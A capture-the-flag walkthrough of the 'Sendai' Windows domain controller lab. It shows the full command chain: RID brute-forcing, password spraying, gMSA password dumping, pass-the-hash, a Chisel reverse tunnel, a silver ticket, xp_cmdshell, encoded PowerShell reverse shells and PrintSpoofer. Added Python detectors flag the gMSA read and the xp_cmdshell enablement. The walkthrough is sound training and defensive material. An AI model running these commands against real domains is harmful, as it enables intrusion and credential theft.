VL - Sendai
Sendai is a medium-rated Windows box created by XCT. It was originally used as a hiring challenge and offers multiple paths to compromise it. In this post I will briefly show one of the available paths and would encourage you to take a look at the other paths yourself!
Enumeration
We start with some enumeration to see what is on the box:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-14 18:08:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
|_ssl-date: TLS randomness does not represent time
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after: 2024-07-18T00:00:00
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-14T18:10:15+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2024-03-13T18:02:06
|_Not valid after: 2024-09-12T18:02:06
| rdp-ntlm-info:
| Target_Name: SENDAI
| NetBIOS_Domain_Name: SENDAI
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sendai.vl
| DNS_Computer_Name: dc.sendai.vl
| DNS_Tree_Name: sendai.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-14T18:09:35+00:00
With SMB open we can try listing the shares to see if any of them are accessible to unauthenticated users:
└─$ smbclient -L //<IP>
Password for [WORKGROUP\bushidosan]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
config Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
sendai Disk company share -- Open
SYSVOL Disk Logon server share
Users Disk -- Open
In the sendai share there is a txt file stating that weak passwords were discovered during a pentest, that the affected passwords were reset, and that they should be changed ASAP. With this in mind, and since the Guest account is enabled, we can brute-force RIDs to enumerate more usernames:
└─$ netexec smb <IP> -u 'Guest' -p '' --shares --rid-brute
SMB 10.10.86.230 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.86.230 445 DC [+] sendai.vl\Guest:
SMB 10.10.86.230 445 DC [*] Enumerated shares
SMB 10.10.86.230 445 DC Share Permissions Remark
SMB 10.10.86.230 445 DC ----- ----------- ------
SMB 10.10.86.230 445 DC ADMIN$ Remote Admin
SMB 10.10.86.230 445 DC C$ Default share
SMB 10.10.86.230 445 DC config
SMB 10.10.86.230 445 DC IPC$ READ Remote IPC
SMB 10.10.86.230 445 DC NETLOGON Logon server share
SMB 10.10.86.230 445 DC sendai READ company share
SMB 10.10.86.230 445 DC SYSVOL Logon server share
SMB 10.10.86.230 445 DC Users READ
SMB 10.10.86.230 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.10.86.230 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.10.86.230 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.10.86.230 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.10.86.230 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.10.86.230 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.10.86.230 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.10.86.230 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.86.230 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.10.86.230 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.86.230 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.86.230 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.86.230 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.10.86.230 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.10.86.230 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.86.230 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.10.86.230 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.10.86.230 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.10.86.230 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.10.86.230 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.10.86.230 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.10.86.230 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.10.86.230 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.10.86.230 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.10.86.230 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.10.86.230 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.10.86.230 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.10.86.230 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.10.86.230 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.10.86.230 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.10.86.230 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.10.86.230 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.10.86.230 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.10.86.230 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.10.86.230 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.10.86.230 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.10.86.230 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.10.86.230 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.10.86.230 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.10.86.230 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.10.86.230 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.10.86.230 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.10.86.230 445 DC 1131: SENDAI\support (SidTypeGroup)
By making a list of these users and trying common password patterns like [company][year] or [season][year], we managed to get the password for Susan.Harper:
SMB 10.10.86.230 445 DC [-] sendai.vl\Susan.Harper:[redacted] STATUS_PASSWORD_MUST_CHANGE
Getting access to mgtsvc$
We can reset the password of Susan with smbpasswd:
smbpasswd -U susan.harper -r sendai.vl
With valid credentials we can run bloodhound-python to gather some more information about the environment:
bloodhound-python -d sendai.vl -c All -dc dc.sendai.vl -ns <IP> -u susan.harper -p <password> --zip
After importing the data into BloodHound and selecting the shortest path to Domain Admins, we see the following path:
- We have a GenericAll on ADMSVC@sendai.vl
- ADMSVC@sendai.vl can read the GMSAPassword of MGTSVC$
We can exploit this by first adding ourselves to the admsvc group:
pth-net rpc group addmem "admsvc" susan.harper -U sendai.vl/susan.harper -S <IP>
Now that we are a member of this group we can dump the NTLM hash of mgtsvc$:
python3 gMSADumper.py -u 'susan.harper' -p '<password>' -d sendai.vl
With this hash we can use Evil-WinRM, or any WinRM tool of your liking, to get a shell on the target:
evil-winrm -i <ip> -u 'mgtsvc$' -H [redacted]
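Defender-side counterpart to the path above, as an added example of my own and not something from the original post: a correlation over constructed Windows Security events that flags a principal reading a gMSA's msDS-ManagedPassword (event 4662) shortly after being added to a group (event 4728), which is exactly the admsvc -> mgtsvc$ sequence. It assumes 4662 auditing is enabled with a SACL on the gMSA object, that the attribute GUID below is msDS-ManagedPassword, and it builds sample SIDs from the domain SID used in the ticketer command further down.

```python
"""Correlate the two Security events that the admsvc -> mgtsvc$ path leaves on the DC.

4728 (member added to a security-enabled global group) followed by 4662 (operation on
an AD object) whose Properties list names msDS-ManagedPassword is the footprint of:
join the group that may read the gMSA password, then read it. Events are modelled as
dicts of the fields a SIEM would extract; correlation is on the member's SID.
"""
from datetime import datetime, timedelta

# schemaIDGUID of msDS-ManagedPassword (assumed constant; verify against your schema).
MANAGED_PASSWORD_GUID = "e362ed86-b728-0842-b27d-2dea7a9df218"

SUSAN = "S-1-5-21-3085872742-570972823-736764132-1112"  # constructed from RID 1112
# Constructed sample events, not real logs from the box.
SAMPLE_EVENTS = [
    {"EventID": 4728, "Time": "2024-03-14T18:20:01", "SubjectUserName": "Susan.Harper",
     "TargetUserName": "admsvc", "MemberSid": SUSAN},
    {"EventID": 4662, "Time": "2024-03-14T18:21:30", "SubjectUserName": "Susan.Harper",
     "SubjectUserSid": SUSAN, "AccessMask": "0x10",
     "ObjectName": "CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl",
     "Properties": "%%7688\n\t{e362ed86-b728-0842-b27d-2dea7a9df218}"},
    {"EventID": 4662, "Time": "2024-03-14T18:25:00", "SubjectUserName": "DC$",
     "SubjectUserSid": "S-1-5-21-3085872742-570972823-736764132-1000", "AccessMask": "0x10",
     "ObjectName": "CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl",
     "Properties": "{e362ed86-b728-0842-b27d-2dea7a9df218}"},
]

def gmsa_reads_after_group_add(events, watched_groups, window=timedelta(hours=1)):
    """Return (reader, group, gmsa_object) for every gMSA password read performed by a
    principal that was added to one of the watched groups within `window` before it.
    Reads by machine accounts (names ending in '$') are ignored as routine."""
    recent_adds = {}  # member SID -> (group name, time of the 4728)
    hits = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        t = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4728 and ev["TargetUserName"].lower() in watched_groups:
            recent_adds[ev["MemberSid"]] = (ev["TargetUserName"], t)
        elif ev["EventID"] == 4662 and MANAGED_PASSWORD_GUID in ev.get("Properties", "").lower():
            if ev["SubjectUserName"].endswith("$"):
                continue
            added = recent_adds.get(ev["SubjectUserSid"])
            if added and t - added[1] <= window:
                hits.append((ev["SubjectUserName"], added[0], ev["ObjectName"]))
    return hits

if __name__ == "__main__":
    for hit in gmsa_reads_after_group_add(SAMPLE_EVENTS, {"admsvc"}):
        print("ALERT: %s joined %s and then read the gMSA password of %s" % hit)
```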
Moving to sqlsvc
On the C drive there is a folder with a file named .sqlconfig which contains the password for the sqlsvc user. We can use this to compute an NTLM hash and forge a silver ticket from it (see Silver Tickets Explained), but first we have to set up a SOCKS proxy connection with Chisel.
On the target:
chisel.exe client <AttackerIP>:8001 R:1080:socks
On the attacker system:
chisel server -p 8001 --reverse
We can now use ticketer.py to create a ticket and import it:
ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash [REDACTED] -dc-ip dc.sendai.vl Administrator -domain sendai.vl
export KRB5CCNAME=Administrator.ccache
With this ticket and the proxy connection we can use mssqlclient.py to access the database:
proxychains mssqlclient.py dc.sendai.vl -k
Since we are the database administrator we can enable xp_cmdshell to get command execution as the sqlsvc user:
sp_configure 'show advanced options', '1'
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
From here there are tons of different ways to get a shell; I used a simple PowerShell reverse shell from revshells.com:
EXEC master..xp_cmdshell 'powershell -e <encoded blob>'
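Because the silver ticket never contacts the KDC, the domain controller's Kerberos logs will not show this MSSQL access, but the SQL Server ERRORLOG still records the sp_configure changes above. The following is an added example of my own (not from the original post) that parses constructed ERRORLOG lines and flags when xp_cmdshell or a similarly risky option is switched on.

```python
"""Scan SQL Server ERRORLOG lines for the sp_configure changes that precede xp_cmdshell
use. Every change is recorded as message 15457 in the form
  Configuration option '<name>' changed from <old> to <new>. Run the RECONFIGURE statement to install.
"""
import re

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Options whose enablement gives a sysadmin login OS command execution as the service account.
RISKY_OPTIONS = {"xp_cmdshell", "ole automation procedures", "clr enabled"}

# Constructed sample ERRORLOG lines, not real output from the box.
SAMPLE_LOG = """\
2024-03-14 18:39:58.10 spid56      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-14 18:39:58.12 spid56      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-14 18:40:01.00 spid56      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2024-03-14 19:02:13.44 spid71      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

def risky_config_enablements(log_text):
    """Return one record per risky option switched from 0 to a non-zero value, with the
    spid so the change can be tied to a login via a SQL Server Audit or XE session."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        option = m.group("option").lower()
        if option in RISKY_OPTIONS and m.group("old") == "0" and m.group("new") != "0":
            findings.append({"time": m.group("ts"), "spid": m.group("spid"), "option": option})
    return findings

if __name__ == "__main__":
    for f in risky_config_enablements(SAMPLE_LOG):
        print("ALERT: %(option)s enabled at %(time)s by %(spid)s" % f)
```

The commands passed to xp_cmdshell are not written to the ERRORLOG; capturing them needs a SQL Server Audit or an Extended Events session on the procedure.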
Escalating to SYSTEM
Since we are running as the sqlsvc service account we usually have impersonation privileges; we can confirm this with:
whoami /priv
There are multiple ways to get to SYSTEM from here, such as PrintSpoofer or SweetPotato. I used PrintSpoofer:
./spoof.exe -i -c "powershell -e <encoded blob>"